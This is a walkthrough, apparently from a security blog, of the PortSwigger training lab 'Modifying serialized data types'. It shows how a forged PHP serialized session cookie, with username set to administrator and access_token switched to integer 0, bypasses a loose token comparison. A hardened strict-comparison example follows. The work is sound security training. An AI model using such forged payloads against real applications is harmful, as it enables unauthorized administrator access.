PortSwigger Lab: Modifying serialized data types | WalkThrough

Introduction

In this post I share my walkthrough of the PortSwigger lab "Modifying serialized data types". The session cookie is a PHP serialized object. To become administrator we change the data type of access_token from a string to an integer: when PHP loosely compares an integer with a string, it effectively converts the entire string to an integer based on its leading number, which lets us bypass the token check and solve the lab.

Objective

This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.

You can log in to your own account using the following credentials: wiener:peter

Detection

Log in with the given credentials wiener:peter.

We can see that our session cookie has been created.

After decoding the cookie we can see PHP serialized data. I wrote a short PHP script that deserializes the cookie so we can inspect its structure.

<?php
// Serialized User object taken from the session cookie (username and access_token are both strings).
$strng = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"a7e4j477ehhln5monacatdqudq8wvp7e";}';
$uns = unserialize($strng);
var_dump($uns);
?>

Exploitation

This works for any alphanumeric string that starts with a number: PHP effectively converts the entire string to an integer based on the leading number and ignores the rest of the string completely. Therefore 5 == "5 of something" is in practice treated as 5 == 5.

So we change the username to administrator and the access_token to an integer.

<?php
// Modified payload: username is now "administrator" and access_token is the integer 0 instead of a string.
$strng = 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}';
$uns = unserialize($strng);
// var_dump($uns->access_token);
var_dump($uns);
?>

s:13 means a string of 13 characters, i.e. administrator.

and i:0 means an integer, here 0.

To learn more about PHP deserialization, read this.

Encode the payload, paste it into the session cookie, browse to /admin and press Enter.

Now delete the user carlos to solve the lab.
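As an added example (not the lab's or the author's own code), the following PHP script reproduces the weak token check behind this lab next to a hardened version. The User class, the stored token array, the checkLoose and checkStrict functions and the tampered payload are assumptions constructed for illustration.

```php
<?php
// Added example: why a loosely compared token can be bypassed by changing
// its serialized type, and the check that prevents it. Everything below is
// constructed for illustration and is not the lab's server code.

class User {
    public $username;
    public $access_token;
}

// Constructed "database" record: the administrator's real token.
$storedTokens = ['administrator' => 'a7e4j477ehhln5monacatdqudq8wvp7e'];

// Vulnerable: loose comparison (==) lets PHP juggle types, so an integer
// token submitted by the client is compared numerically with the stored string.
function checkLoose(User $u, array $tokens): bool {
    return isset($tokens[$u->username]) && $u->access_token == $tokens[$u->username];
}

// Hardened: require a string, then compare with a constant-time strict check.
function checkStrict(User $u, array $tokens): bool {
    if (!is_string($u->access_token) || !isset($tokens[$u->username])) {
        return false;
    }
    return hash_equals($tokens[$u->username], $u->access_token);
}

// Tampered cookie payload: username changed to administrator, token type changed to i:0.
$tampered = 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}';

// allowed_classes restricts which classes unserialize() may instantiate.
$u = unserialize($tampered, ['allowed_classes' => ['User']]);

var_dump(checkLoose($u, $storedTokens));
var_dump(checkStrict($u, $storedTokens));
?>
```

On PHP 7.x the loose check accepts the integer token because a non-numeric string is cast to 0; PHP 8 changed integer-to-string comparison so that particular case fails, but leading-numeric strings such as "5 of something" still compare equal to 5, so the strict check remains the correct fix on every version.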

WraithOP

eJPT | eCPPT | DarkArmy CTF Player